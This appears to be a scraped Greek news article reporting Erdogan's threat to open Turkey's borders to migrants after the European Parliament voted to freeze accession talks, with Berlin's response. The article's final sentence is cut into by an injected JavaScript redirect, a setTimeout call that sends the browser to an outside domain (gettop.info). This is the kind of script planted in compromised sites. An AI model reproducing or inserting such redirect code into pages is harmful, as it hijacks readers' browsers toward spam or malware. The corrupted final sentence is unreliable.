Απειλεί ο Ερντογάν: Θα ανοίξω τα σύνορα και θα πλημμυρίσει η Ευρώπη πρόσφυγες

0
2

 

Στη διάρκεια ομιλίας του στην Κωνταντινούπολη ο Τούρκος Πρόεδρος Ταγίπ Ερντογάν εξαπέλυσε νέες απειλές καά της ΕΕ εξοργισμένος με το ψήφισμα του Ευρωκοινοβουλίου που αποφάσισε το πάγωμα στις ενταξιακές συνομιλίες με την Άγκυρα.

Όπως απείλησε ο Ενρτογάν θα ανοίξει τα σύνορα για να επιτρέψει τη διέλευση των προσφύγων και μεταναστών προς την Ευρώπη: «Ακούστε καλά. Εάν προχωρήσετε περαιτέρω, αυτά τα σύνορα θα ανοίξουν, βάλτε το καλά στο κεφάλι σας», δήλωσε ο Ερντογάν κατά τη διάρκεια ομιλίας του στην Κωνσταντινούπολη.

«Οταν 50.000 μετανάστες συγκεντρώθηκαν στο συνοριακό πέρασμα του Καπίκουλε (στα τουρκο-βουλγαρικά σύνορα) φωνάξατε βοήθεια. Αρχίσατε να αναρωτιέστε: «Τι θα κάνουμε εάν η Τουρκία ανοίξει τα σύνορά της;». Ακούστε με καλά. Εάν προχωρήσετε περαιτέρω, αυτά τα σύνορα θα ανοίξουν. Βάλτε το καλά στο μυαλό σας», είπε.

Απάντηση έδωσε το Βερολίνο και η εκπρόσωπος της καγκελαρίου λέγοντας ότι οι απειλές δεν οδηγούν πουθενά setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here